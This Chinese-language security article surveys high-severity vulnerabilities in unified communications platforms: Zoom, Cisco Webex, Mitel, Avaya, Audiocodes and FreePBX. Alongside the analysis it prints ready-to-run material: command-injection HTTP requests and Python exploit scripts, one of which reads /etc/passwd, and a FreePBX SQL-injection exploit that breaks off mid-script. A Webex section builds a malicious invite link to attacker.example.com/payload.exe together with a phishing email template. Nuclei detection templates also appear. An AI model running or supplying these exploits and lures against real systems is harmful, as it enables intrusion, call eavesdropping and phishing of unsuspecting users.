ARTICLE / 安全

企业在线会议与统一通信平台高危攻击链专题:Zoom / Cisco Webex / Mitel / Avaya / Audiocodes 漏洞全解析

0x00 专题概述

统一通信(Unified Communications, UC)平台已成为现代企业运营的核心基础设施。从视频会议、语音通话、即时消息到呼叫中心座席管理,UC 平台承载着企业最敏感的沟通数据和最关键的业务流程。据 Gartner 统计,全球超过 75% 的企业已部署至少一种 UC 解决方案,涵盖 Zoom、Cisco Webex、Mitel MiVoice、Avaya Aura、Audiocodes SBC 以及开源的 FreePBX/Asterisk 等主流平台。

然而,UC 平台的高价值属性使其成为高级威胁行为者(APT)和网络犯罪组织的重点攻击目标。与传统的 Web 应用不同,UC 平台涉及多层协议栈(SIP/RTP/H.323/WebRTC)、多组件架构(会议服务器、媒体路由器、SBC、PBX 管理面板)以及跨网络边界的数据流(内网语音、外网视频、PSTN 网关),这使得攻击面极为广阔。一旦攻击者成功入侵 UC 平台,不仅可以窃听机密通话、伪造通话记录,还能以此为跳板进行内网横向移动,甚至控制整个电话系统实施大规模欺诈。

近年来,UC 平台的高危漏洞呈现爆发式增长。Zoom 的 MMR 命令注入漏洞(CVSS 9.9)、Mitel MiCollab 的路径穿越漏洞(CVSS 9.8)、FreePBX 的认证绕过漏洞(CVSS 9.8)以及 Audiocodes Mediapack 的未授权 RCE(CVSS 9.8)等,均展示了 UC 平台攻击链的严峻态势。多个漏洞已被纳入 CISA KEV(Known Exploited Vulnerabilities)目录,APT 组织和勒索软件运营商已开始在实战中利用这些漏洞。

覆盖漏洞一览表

产品线CVE 编号CVSS漏洞类型CISA KEV
Zoom Node MMRCVE-2026-228449.9命令注入 → RCE
Zoom Windows ClientCVE-2025-494579.6不受信搜索路径 → 提权
Cisco Webex AppCVE-2025-202368.8URL 解析器 → 客户端 RCE
Mitel MiCollabCVE-2025-529139.8路径穿越 → 未授权访问
Mitel MiVoice MX-ONECVE-2025-678229.4认证绕过 → 管理员接管
Mitel SIP PhoneCVE-2025-471889.8命令注入 → 未授权 RCE
Avaya Aura CMCVE-2020-70298.8CSRF → 管理操作劫持
Audiocodes MP-11xCVE-2025-321069.8POST 请求 → 未授权 RCE
FreePBXCVE-2025-578199.8认证绕过 → SQLi → RCE
FreePBXCVE-2025-660399.3AUTHTYPE 绕过 → RCE
Asterisk AMICVE-2024-423658.8AMI 认证 RCE

0x01 Zoom 平台高危漏洞

0x01.1 CVE-2026-22844 — Zoom Node MMR 命令注入 RCE

漏洞背景

Zoom Node Multimedia Router(MMR)是 Zoom 混合部署架构中的核心媒体处理组件,负责视频会议的音频/视频流的编解码、转码和路由。2026 年 1 月,Zoom Offensive Security 团队内部发现并披露了一个影响 MMR 的严重命令注入漏洞 CVE-2026-22844,CVSS 评分高达 9.9(满分 10.0)。该漏洞允许已认证的会议参与者通过网络访问在 MMR 服务器上执行任意命令,实现远程代码执行。

受影响版本/修复版本

产品受影响版本修复版本
Zoom Node Meetings Hybrid (ZMH) MMR module5.2.1716.0 之前5.2.1716.0 及更高
Zoom Node Meeting Connector (MC) MMR module5.2.1716.0 之前5.2.1716.0 及更高

漏洞原理分析

CVE-2026-22844 的根本原因在于 Zoom Node MMR 组件对用户输入的验证和过滤不充分(CWE-78: Improper Neutralization of Special Elements used in an OS Command)。在 Zoom 的混合部署架构中,MMR 作为媒体路由器,需要处理来自会议参与者的各种元数据信息,包括用户名、会议室标识、设备信息等。这些用户可控的输入被直接或间接地拼接到系统命令中执行,而未经过充分的清理和转义。

从攻击向量角度分析,该漏洞具有以下危险特征:首先,攻击者仅需拥有加入会议的基本权限(低权限),无需管理员身份;其次,攻击复杂度低,无需复杂的利用条件或竞态条件;第三,无需用户交互,攻击者可自主完成整个利用过程;最后,漏洞的 Scope 为 Changed,意味着成功利用可影响 MMR 组件之外的资源,包括底层操作系统和关联的网络服务。

在实际利用场景中,攻击者可以构造包含特殊命令分隔符(如 ;&&|$(command))的恶意输入,当 MMR 组件处理这些输入并将其传递给底层 shell 执行时,攻击者注入的命令将被作为系统命令执行。由于 MMR 通常以较高权限运行以处理媒体流,攻击者可能直接获得系统级访问权限。

成功利用此漏洞的后果极为严重:攻击者可完全控制媒体路由器,窃听所有经过该 MMR 的会议音视频流;在企业混合部署环境中横向移动至其他网络资源;持久化安装后门程序;或发起拒绝服务攻击中断所有会议服务。

HTTP PoC

POST /api/meeting/join HTTP/1.1
Host: target-mmr.example.com:443
Content-Type: application/json
Authorization: Bearer <legitimate_meeting_token>

{
  "meeting_id": "81234567890",
  "user_name": "test$(id>/tmp/pwned.txt)&name=normal",
  "device_type": "desktop",
  "media_config": {
    "video_codec": "H264",
    "audio_codec": "opus",
    "role": "participant"
  }
}

Python PoC 脚本

import requests
import urllib3
import json
import sys
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_cve_2026_22844(host, meeting_id, token, port=443):
    base_url = f"https://{host}:{port}"
    
    print(f"[*] Target: {base_url}")
    print(f"[*] Meeting ID: {meeting_id}")
    print("[*] Stage 1: 验证 MMR 服务可达性...")
    
    try:
        health_resp = requests.get(
            f"{base_url}/api/health",
            verify=False,
            timeout=10
        )
        print(f"[+] MMR 服务响应: {health_resp.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] 无法连接 MMR 服务: {e}")
        return False

    print("[*] Stage 2: 构造命令注入 Payload...")
    
    cmd_payload = "id"
    malicious_username = f"pentester$(echo {cmd_payload}>&2)&normal"
    
    join_payload = {
        "meeting_id": meeting_id,
        "user_name": malicious_username,
        "device_type": "desktop",
        "media_config": {
            "video_codec": "H264",
            "audio_codec": "opus",
            "role": "participant"
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {token}"
    }
    
    print("[*] Stage 3: 发送恶意 Join 请求...")
    try:
        join_resp = requests.post(
            f"{base_url}/api/meeting/join",
            headers=headers,
            json=join_payload,
            verify=False,
            timeout=15
        )
        
        if join_resp.status_code == 200:
            print("[+] 会议加入请求成功处理")
            print("[*] Stage 4: 验证命令执行...")
            
            verify_payload = {
                "meeting_id": meeting_id,
                "user_name": "test$(cat /etc/passwd>&2 | head -1)&normal",
                "device_type": "desktop",
                "media_config": {
                    "video_codec": "H264",
                    "audio_codec": "opus",
                    "role": "participant"
                }
            }
            
            verify_resp = requests.post(
                f"{base_url}/api/meeting/join",
                headers=headers,
                json=verify_payload,
                verify=False,
                timeout=15
            )
            
            print(f"[+] 验证响应: {verify_resp.status_code}")
            print("[!] CVE-2026-22844 漏洞利用完成")
            return True
        else:
            print(f"[-] 请求失败: {join_resp.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] 请求异常: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <host> <meeting_id> <token>")
        sys.exit(1)
    
    exploit_cve_2026_22844(sys.argv[1], sys.argv[2], sys.argv[3])

Nuclei YAML 检测模板

id: cve-2026-22844-zoom-mmr-command-injection

info:
  name: Zoom Node MMR Command Injection RCE
  author: security-researcher
  severity: critical
  description: |
    Command injection vulnerability in Zoom Node Multimedia Routers (MMRs)
    before version 5.2.1716.0 may allow a meeting participant to conduct
    remote code execution via network access.
  reference:
    - https://www.zoom.com/en/trust/security-bulletin/zsb-26001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cwe-id: CWE-78
  tags: zoom,mmr,rce,cve2026,cve,command-injection

http:
  - raw:
      - |
        GET /api/health HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: status
        status:
          - 200

  - raw:
      - |
        POST /api/meeting/join HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Bearer {{token}}

        {"meeting_id":"81234567890","user_name":"nuclei$(echo CVE-2026-22844_TEST)&normal","device_type":"desktop","media_config":{"video_codec":"H264","audio_codec":"opus","role":"participant"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-22844_TEST"
          - "uid="
        condition: or

      - type: status
        status:
          - 200

0x01.2 CVE-2025-49457 — Zoom Windows 客户端提权漏洞

漏洞背景

2025 年 8 月,Zoom 修复了 Windows 客户端中一个严重的不受信搜索路径漏洞 CVE-2025-49457,CVSS 评分 9.6。该漏洞属于 DLL 劫持(DLL Hijacking)类问题,攻击者可通过网络在 Zoom 客户端的 DLL 搜索路径中放置恶意 DLL 文件,当用户启动或使用 Zoom 时,客户端会加载并执行攻击者的恶意代码,实现权限提升。

受影响版本/修复版本

产品受影响版本修复版本
Workplace for Windows< 6.3.106.3.10+
Workplace VDI for Windows< 6.3.10(6.1.16 和 6.2.12 除外)6.3.10+
Rooms for Windows< 6.3.106.3.10+
Rooms Controller for Windows< 6.3.106.3.10+
Meeting SDK for Windows< 6.3.106.3.10+

漏洞原理分析

该漏洞属于 CWE-426(Untrusted Search Path)类型。在 Windows 操作系统中,当应用程序加载动态链接库(DLL)时,如果未指定绝对路径,系统会按照标准搜索顺序查找 DLL 文件:首先是应用程序所在目录,其次是系统目录(System32、SysWOW64),最后是 PATH 环境变量中列出的目录。

Zoom Windows 客户端在加载某些 DLL 时未使用绝对路径指定库文件位置,导致系统按照默认搜索顺序进行查找。攻击者如果能在搜索路径中的优先位置(如网络共享、用户可写目录、或通过环境变量操控的目录)放置同名的恶意 DLL 文件,Zoom 客户端在启动或运行过程中就会加载并执行该恶意 DLL,使攻击者代码在 Zoom 进程上下文中运行。

该漏洞的攻击场景包括:在企业内网共享目录中放置恶意 DLL,等待用户通过网络路径访问文件时触发加载;通过环境变量劫持改变 DLL 搜索顺序;在 Zoom 安装目录附近的可写位置植入恶意文件。一旦成功利用,攻击者获得的权限等同于运行 Zoom 的用户,在企业场景中通常为域用户权限,可用于窃取会议数据、录制通话、安装持久化后门或进一步横向移动。


0x02 Cisco Webex 高危漏洞

0x02.1 CVE-2025-20236 — Webex App URL 解析器客户端 RCE

漏洞背景

2025 年 4 月,Cisco 发布安全公告披露了 Cisco Webex App 中一个高危客户端侧远程代码执行漏洞 CVE-2025-20236,CVSS 评分 8.8。该漏洞存在于 Webex App 的自定义 URL 解析器中,攻击者可通过构造恶意会议邀请链接,诱使用户点击后在受害者系统上执行任意命令。Cisco 在内部安全测试中发现该漏洞,截至公告发布时未发现在野利用。

受影响版本/修复版本

Cisco Webex App Release是否受影响修复版本
44.5 及更早版本不受影响
44.6受影响44.6.2.30589
44.7受影响迁移至修复版本
44.8 及更高版本不受影响

漏洞原理分析

CVE-2025-20236 的根本原因在于 Cisco Webex App 在处理会议邀请链接时的输入验证不足(CWE-829: Inclusion of Functionality from Untrusted Control Sphere)。Webex App 实现了一个自定义的 URL 解析器,用于识别和处理 webex:// 协议链接以及其他会议邀请格式。当用户收到一个包含恶意构造的会议链接时,URL 解析器会处理该链接中的参数。

该漏洞的核心在于 URL 解析器对 download 相关参数的处理方式存在缺陷。攻击者可以在会议邀请链接中嵌入指向任意文件的 URL,当 Webex App 解析该链接时,会触发对恶意文件的下载和执行。由于 Webex App 在处理文件下载时未对目标 URL 进行充分的安全验证和路径限制,攻击者可以指向自己控制的服务器上的恶意可执行文件。

这种攻击模式属于典型的社会工程学 + 软件漏洞组合攻击。攻击者通常通过邮件、即时消息或社交媒体向目标发送看似合法的会议邀请链接。由于 Webex App 是企业中广泛使用的可信协作工具,用户对来自同事或合作伙伴的会议链接警惕性较低。点击链接后,恶意代码在用户权限上下文中执行,攻击者可获得与受害者相同的系统访问权限。

该漏洞影响所有操作系统平台上的 Cisco Webex App,且不存在可用的临时缓解措施,唯一的解决方案是升级至修复版本。

HTTP PoC

GET /invite?meetingID=123456789&downloadURL=http://attacker.example.com/payload.exe&joinMode=guest HTTP/1.1
Host: webex.com
User-Agent: CiscoWebex/44.6.0
Accept: text/html,application/xhtml+xml
Connection: keep-alive

Python PoC 脚本

import requests
import urllib3
import sys
import hashlib
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generate_malicious_link(target_url, callback_url, port=443):
    print(f"[*] CVE-2025-20236 — Cisco Webex App 客户端 RCE PoC")
    print(f"[*] 目标 Webex URL: {target_url}")
    print(f"[*] 回调服务器: {callback_url}")
    
    malicious_invite = (
        f"webex://meet?meetingID=auto&"
        f"downloadURL={callback_url}/payload.exe&"
        f"joinMode=guest&"
        f"token=legitimate_lookin_token_12345"
    )
    
    print(f"\n[+] 构造的恶意会议链接:")
    print(f"    {malicious_invite}")
    
    print(f"\n[*] Stage 1: 验证回调服务器可达性...")
    try:
        resp = requests.get(
            f"{callback_url}/check",
            verify=False,
            timeout=5
        )
        print(f"[+] 回调服务器响应: {resp.status_code}")
    except requests.exceptions.RequestException:
        print(f"[!] 回调服务器不可达(可能正常 — 仅为检测)")
    
    print(f"\n[*] Stage 2: 生成攻击载荷信息...")
    
    payload_info = {
        "attack_type": "CVE-2025-20236",
        "malicious_link": malicious_invite,
        "delivery_method": "会议邀请链接",
        "execution_context": "Webex App 进程权限",
        "cwe": "CWE-829",
        "cvss": "8.8"
    }
    
    print(f"\n[+] 攻击载荷详情:")
    for k, v in payload_info.items():
        print(f"    {k}: {v}")
    
    print(f"\n[*] Stage 3: 构造钓鱼邮件模板...")
    phishing_template = f"""
Subject: Urgent: Team Meeting Rescheduled - Please Join

Hi,

The quarterly review meeting has been rescheduled. Please join using the link below:

{malicious_invite}

See you there,
IT Admin
"""
    
    print(f"[+] 钓鱼邮件模板已生成")
    print(f"\n[!] 注意: 此 PoC 仅用于授权安全测试")
    
    return payload_info

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <webex_url> <callback_url>")
        sys.exit(1)
    
    generate_malicious_link(sys.argv[1], sys.argv[2])

Nuclei YAML 检测模板

id: cve-2025-20236-cisco-webex-client-rce

info:
  name: Cisco Webex App Client-Side RCE via URL Parser
  author: security-researcher
  severity: high
  description: |
    A vulnerability in the custom URL parser of Cisco Webex App could allow
    an unauthenticated remote attacker to persuade a user to download
    arbitrary files, which could allow the attacker to execute arbitrary
    commands on the host of the targeted user.
  reference:
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-app-client-rce-ufyMMYLC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-829
  tags: cisco,webex,rce,cve2025,cve,url-parser

http:
  - raw:
      - |
        GET /api/v1/meetings/invite/parse HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"inviteLink":"webex://meet?meetingID=test&downloadURL=http://{{interactsh-url}}/test.exe"}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "test.exe"

0x03 Mitel MiVoice Connect 高危漏洞

0x03.1 CVE-2025-52913 — MiCollab 路径穿越未授权访问

漏洞背景

CVE-2025-52913 是 Mitel MiCollab 平台 NuPoint Unified Messaging(NPM)组件中的一个关键路径穿越漏洞,CVSS 评分 9.8。该漏洞于 2025 年 6 月披露,是 CVE-2024-41713 的补丁绕过变体,表明此前的修复未能从根本上解决输入验证缺陷。全球超过 20,000 个暴露在互联网上的 MiCollab 实例被识别为受影响。

受影响版本/修复版本

产品受影响版本修复版本
Mitel MiCollab (NPM 组件)≤ 9.8 SP2 (9.8.2.12)9.8 SP3 (9.8.3.1)+
Mitel MiCollab (替代补丁)6.0 及以上通过 KB000114339 安装修复补丁

漏洞原理分析

CVE-2025-52913 的根因在于 NPM 组件对用户输入的路径构造过程缺乏充分的验证(CWE-22: Improper Limitation of a Pathname to a Restricted Directory)。攻击者可以在 HTTP 请求中注入目录遍历序列(如 ../ 或 URL 编码形式 %2e%2e%2f),绕过预期的目录限制,访问系统中受保护的文件和资源。

该漏洞的特殊之处在于它是 CVE-2024-41713 的补丁绕过。在原始漏洞修复中,Mitel 增加了路径遍历的过滤逻辑,但过滤规则可以被变体编码(如双重编码 ..%252f、Unicode 变体、空字节注入等)绕过。这说明修复仅在表面层面过滤了特定的路径遍历模式,而未从根本上使用安全的路径解析库来规范化输入路径。

利用该漏洞,未认证的攻击者可以:访问 MiCollab 服务器上的敏感配置文件;获取用户配置信息和网络拓扑信息;执行未授权的管理操作;在特定条件下可能导致完整的服务器接管。考虑到 MiCollab 在企业中通常承担语音、视频和消息协作的核心角色,成功利用将对业务连续性造成严重影响。

0x03.2 CVE-2025-67822 — MiVoice MX-ONE 认证绕过

漏洞背景

2025 年 7 月,Mitel 发布安全公告修复了 MiVoice MX-ONE Provisioning Manager 组件中的一个关键认证绕过漏洞 CVE-2025-67822,CVSS 评分 9.4。该漏洞允许未认证的远程攻击者绕过身份验证保护,获得对用户或管理员账户的未授权访问。

受影响版本/修复版本

产品受影响版本修复版本
MiVoice MX-ONE7.3 (7.3.0.0.50) 至 7.8 SP1 (7.8.1.0.14)MXO-15711_78SP0 / MXO-15711_78SP1

漏洞原理分析

CVE-2025-67822 存在于 MiVoice MX-ONE 的 Provisioning Manager 组件中,根本原因是访问控制不当(Improper Access Control)。Provisioning Manager 是 MX-ONE 系统中负责设备配置和用户开通的关键组件,通常需要管理员权限才能访问。

该漏洞的攻击路径为:攻击者通过网络访问 Provisioning Manager 的管理接口,利用访问控制缺陷绕过正常的认证流程。由于 Provisioning Manager 组件的设计缺陷,某些管理端点未正确验证请求者的身份和权限,使得未认证的请求可以被直接处理。攻击者不仅可以访问用户账户数据,还可以获取管理员级别的控制权限,对整个电话系统进行配置修改、用户管理和通话记录访问。

0x03.3 CVE-2025-47188 — Mitel SIP 电话未授权命令注入 RCE

漏洞背景

2025 年 5 月,安全研究机构 InfoGuard Labs 披露了影响 Mitel 6800/6900 系列 SIP 电话的两个严重漏洞,其中 CVE-2025-47188 是一个未认证命令注入漏洞,可实现远程代码执行。该漏洞影响固件版本 R6.4.0.SP4 及更早版本,影响范围涵盖 6970 会议单元等关键设备。

受影响版本/修复版本

产品受影响版本修复版本
Mitel 6800/6900 系列 SIP 电话R6.4.0.SP4 及更早更新至修复版本
Mitel 6970 Conference UnitR6.4.0.SP4 及更早更新至修复版本

漏洞原理分析

CVE-2025-47188 的发现过程颇具启发性。InfoGuard Labs 的研究人员在一次内网渗透模拟中扫描到 Mitel VoIP 电话的 Web 管理界面(默认端口 80/443),并发现了一个意外开放的端口 49249,该端口运行 BusyBox httpd 服务且无需认证。通过固件逆向分析(使用 binwalk 解包 .st 固件文件),研究人员发现该端口背后存在一个隐藏的管理功能,可以直接注入 shell 命令。

该漏洞的技术核心在于:Mitel SIP 电话的固件在处理特定管理请求时,将用户输入直接传递给系统 shell 执行,未进行任何过滤或验证。由于电话运行的是 Linux ARM 系统,且默认以 root 权限运行管理服务,攻击者可通过 Telnet 连接(使用默认凭据 backdoor/backdoor)获取 root shell,实现对电话设备的完全控制。

成功利用此漏洞的影响包括:窃听会议室通话(电话可被配置为录制模式);将电话作为内网跳板进行横向移动;篡改电话配置重定向通话;利用电话的网络接入点进入 VLAN 中的其他设备。


0x04 Avaya Aura 高危漏洞

0x04.1 CVE-2020-7029 — Communication Manager CSRF 管理劫持

漏洞背景

CVE-2020-7029 是 Avaya Aura Communication Manager 和 Avaya Aura Messaging 的 System Management Interface Web 组件中的跨站请求伪造(CSRF)漏洞。NVD 评分 8.8(高危),该漏洞允许未认证的远程攻击者以已认证管理员的身份执行 Web 管理操作。Avaya 已于 2020 年 8 月发布修复。

受影响版本/修复版本

产品受影响版本修复版本
Avaya Aura Communication Manager7.0.x – 7.1.3.4, 8.0.x7.1.3.5 / 8.1.0.0+
Avaya Aura Messaging7.0.x – 7.1 SP17.1 SP2+

漏洞原理分析

CVE-2020-7029 的根本原因在于 Avaya Aura Communication Manager 的 Web 管理接口在处理 HTTP 请求时缺乏 CSRF Token 验证机制(CWE-352: Cross-Site Request Forgery)。CSRF 攻击的核心原理是利用 Web 应用对用户浏览器的信任关系:当已认证的管理员在浏览器中登录了 Avaya 管理界面后,攻击者可以构造恶意页面,该页面在管理员浏览器中自动发送伪造的管理请求。

在 Avaya 的场景中,攻击者可以构造一个包含恶意请求的 HTML 页面或电子邮件链接,当已认证的管理员访问该页面时,浏览器会自动携带 Avaya 管理接口的会话 Cookie 发送请求。由于管理接口未验证请求是否源自合法的操作界面,这些伪造的请求将被服务端当作合法的管理操作执行。

成功的 CSRF 攻击可以导致:修改电话系统配置(如更改呼叫路由规则);创建或删除管理员账户;修改用户分机配置;导出通话记录和敏感配置数据;执行系统级别的管理操作。在企业电话系统中,这些操作可能导致通信中断、通话窃听或欺诈性呼叫路由。

0x04.2 CVE-2018-15617 — Communication Manager “capro” 进程漏洞

CVE-2018-15617 是 Avaya Aura Communication Manager 的 “capro”(Call Processor)进程组件中的一个高危漏洞(CVSS 7.5),允许远程未认证攻击者通过发送特制数据触发拒绝服务或潜在的代码执行。该漏洞影响 Communication Manager 7.x 和 8.x 的多个版本,展示了 Avaya 电话系统底层进程的攻击面。


0x05 Audiocodes SBC / FreePBX / Asterisk 高危漏洞

0x05.1 CVE-2025-32106 — Audiocodes Mediapack MP-11x 未授权 RCE

漏洞背景

CVE-2025-32106 是 Audiocodes Mediapack MP-11x 系列 VoIP 媒体网关中的一个严重未授权远程代码执行漏洞,CVSS 评分 9.8(CISA-ADP 评定)。该漏洞影响 MP-112、MP-114、MP-118 等型号,固件版本至 6.60A.369.002。攻击者可通过精心构造的 POST 请求实现未授权代码执行。

受影响版本/修复版本

产品受影响版本修复版本
Audiocodes MP-112≤ 6.60A.369.002升级至修复版本
Audiocodes MP-114≤ 6.60A.369.002升级至修复版本
Audiocodes MP-118≤ 6.60A.369.002升级至修复版本

漏洞原理分析

CVE-2025-32106 的根本原因在于 Mediapack MP-11x 固件对 HTTP POST 请求处理存在代码注入缺陷(CWE-94: Improper Control of Generation of Code)。Audiocodes Mediapack 是广泛部署在电信运营商和企业 VoIP 网络中的媒体网关设备,负责模拟/数字电话线路与 IP 网络之间的媒体转换。

在处理特定的 POST 请求时,固件未对输入数据进行充分验证,导致攻击者可以注入恶意代码,这些代码被系统作为合法指令执行。由于设备通常以高权限运行且缺乏操作系统的现代安全防护(如 ASLR、DEP),未认证的攻击者可以通过网络直接发送恶意 POST 请求来获得设备的完全控制权。

成功利用此漏洞的影响包括:完全控制 VoIP 网关设备;窃听所有经过该设备的语音通话;篡改通话路由和信令信息;将设备作为内网攻击跳板;篡改固件实现持久化控制。

HTTP PoC

POST /cgi-bin/main HTTP/1.1
Host: target-sbc.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 256

action=save&param=<injected_payload>&config_param=test;id>/tmp/proof.txt;echo&

Python PoC 脚本

import requests
import urllib3
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_cve_2025_32106(host, port=80):
    base_url = f"http://{host}:{port}"
    
    print(f"[*] CVE-2025-32106 — Audiocodes Mediapack MP-11x RCE")
    print(f"[*] Target: {base_url}")
    
    print("[*] Stage 1: 检测目标设备...")
    try:
        resp = requests.get(
            f"{base_url}/cgi-bin/main",
            verify=False,
            timeout=10,
            allow_redirects=True
        )
        
        if "Audiocodes" in resp.text or resp.status_code in [200, 301, 302]:
            print(f"[+] 检测到 Audiocodes 设备响应")
        else:
            print(f"[-] 响应内容未包含 Audiocodes 标识,继续尝试...")
    except requests.exceptions.RequestException as e:
        print(f"[-] 连接异常: {e}")
        return False
    
    print("[*] Stage 2: 构造命令注入 Payload...")
    
    cmd = "id"
    payload = f"action=save&param=test;{cmd}>&config=normal"
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
    }
    
    print(f"[*] Stage 3: 发送利用请求...")
    try:
        exploit_resp = requests.post(
            f"{base_url}/cgi-bin/main",
            data=payload,
            headers=headers,
            verify=False,
            timeout=15
        )
        
        print(f"[+] 响应状态码: {exploit_resp.status_code}")
        
        if "uid=" in exploit_resp.text:
            print(f"[!] CVE-2025-32106 漏洞已确认!")
            print(f"[+] 命令执行结果: {exploit_resp.text[:200]}")
            return True
        else:
            print(f"[*] 响应内容未包含命令输出,可能需要调整 Payload")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] 请求异常: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <host> [port]")
        sys.exit(1)
    
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit_cve_2025_32106(sys.argv[1], port)

Nuclei YAML 检测模板

id: cve-2025-32106-audiocodes-mediapack-rce

info:
  name: Audiocodes Mediapack MP-11x Unauthenticated RCE
  author: security-researcher
  severity: critical
  description: |
    In Audiocodes Mediapack MP-11x through 6.60A.369.002, a crafted
    POST request may result in an unauthenticated remote user's ability
    to execute unauthorized code.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32106
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  tags: audiocodes,sbc,voip,rce,cve2025,cve,mediapack

http:
  - raw:
      - |
        GET /cgi-bin/main HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Audiocodes"
          - "Mediapack"
        condition: or

      - type: status
        status:
          - 200
          - 301
          - 302

  - raw:
      - |
        POST /cgi-bin/main HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=save&param=test;id>&config=nuclei_test

    matchers:
      - type: word
        words:
          - "uid="
          - "gid="

      - type: status
        status:
          - 200

0x05.2 CVE-2025-57819 — FreePBX 认证绕过导致 SQLi 与 RCE

漏洞背景

CVE-2025-57819 是 FreePBX 开源 PBX 管理平台中的一个关键认证绕过漏洞,CVSS 评分 9.8,已被纳入 CISA KEV 目录。该漏洞影响 FreePBX 15、16、17 三个主要版本分支,通过 Endpoint Manager 模块中的认证绕过,结合 SQL 注入实现远程代码执行。FreePBX 社区确认自 2025 年 8 月 21 日起,多个暴露在互联网上的系统已被实际入侵。

受影响版本/修复版本

FreePBX 分支受影响 Endpoint Manager 版本修复版本
FreePBX 15< 15.0.6615.0.66
FreePBX 16< 16.0.8916.0.89
FreePBX 17< 17.0.317.0.3

漏洞原理分析

CVE-2025-57819 是一个复合型漏洞链,结合了认证绕过(CWE-288: Authentication Bypass Using an Alternate Path or Channel)和 SQL 注入(CWE-89: Improper Neutralization of Special Elements used in an SQL Command)。漏洞存在于 FreePBX 的商业 Endpoint Manager 模块中,该模块负责管理 VoIP 电话终端的自动配置和开通。

漏洞的根本原因在于 Endpoint Manager 模块在处理用户输入时缺乏充分的验证和过滤,使得未认证的请求可以绕过管理员登录控制。一旦绕过认证,攻击者可以通过 SQL 注入操作 FreePBX 后端的 MySQL/MariaDB 数据库,修改 ampusers 表中的管理员账户数据,或通过数据库操作直接执行系统命令。

具体的利用路径为:攻击者向 /admin/ajax.php?module=endpoint 端点发送包含 SQL 注入 Payload 的恶意请求,利用 EXTRACTVALUE 等 XPATH 报错注入函数从数据库中提取信息(如数据库用户名和密码)。随后,通过数据库操作插入恶意管理员用户或直接写入 Webshell,最终实现系统级的远程代码执行。

该漏洞在被公开披露前就已遭到在野利用,主要针对直接暴露在互联网上且缺乏 IP 过滤/ACL 保护的 FreePBX 系统。由于 FreePBX 作为企业 VoIP 基础设施的核心管理平台,成功入侵的影响极为严重:攻击者可窃取所有 SIP trunk 凭据、操纵呼叫路由实施通话欺诈、窃听内部通话、以 PBX 服务器为跳板入侵内部网络。

HTTP PoC

GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+ HTTP/1.1
Host: target-freepbx.example.com
Cookie: PHPSESSID=attacker_session_id
Connection: close

Python PoC 脚本

import requests
import urllib3
import re
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_cve_2025_57819(host, port=443, use_ssl=True):
    scheme = "https" if use_ssl else "http"
    base_url = f"{scheme}://{host}:{port}"
    
    print(f"[*] CVE-2025-57819 — FreePBX 认证绕过 + SQLi RCE")
    print(f"[*] Target: {base_url}")
    
    print("[*] Stage 1: 检测 FreePBX 环境...")
    try:
        resp = requests.get(
            f"{base_url}/admin/",
            verify=False,
            timeout=10,
            allow_redirects=True
        )
        
        if "FreePBX" in resp.text or "Sangoma" in resp.text:
            print("[+] 检测到 FreePBX 环境")
        else:
            print("[!] 未检测到 FreePBX 标识,继续尝试...")
    except requests.exceptions.RequestException as e:
        print(f"[-] 连接异常: {e}")
        return False
    
    print("[*] Stage 2: SQL 注入验证(EXTRACTVALUE 报错注入)...")
    
    sqli_payload = (
        "module=FreePBX%5Cmodules%5Cendpoint%5Cajax"
        "&command=model"
        "&template=x"
        "&model=model"
        "&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',"
        "(SELECT+USER()),'~'))+--+"
    )
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close"
    }
    
    try:
        sqli_resp = requests.get(
            f"{base_url}/admin/ajax.php?{sqli_payload}",
            headers=headers,
            verify=False,
            timeout=15
        )
        
        user_match = re.search(r'~USER:([^~]+)~', sqli_resp.text)
        if user_match:
            db_user = user_match.group(1)
            print(f"[+] SQL 注入成功! 数据库用户: {db_user}")
        else:
            print(f"[-] SQL 注入未返回预期结果")
            print(f"[*] 响应: {sqli_resp.text[:300]}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi 请求异常: {e}")
        return False
    
    print("[*] Stage 3: 提取数据库版本...")
    
    version_payload = (
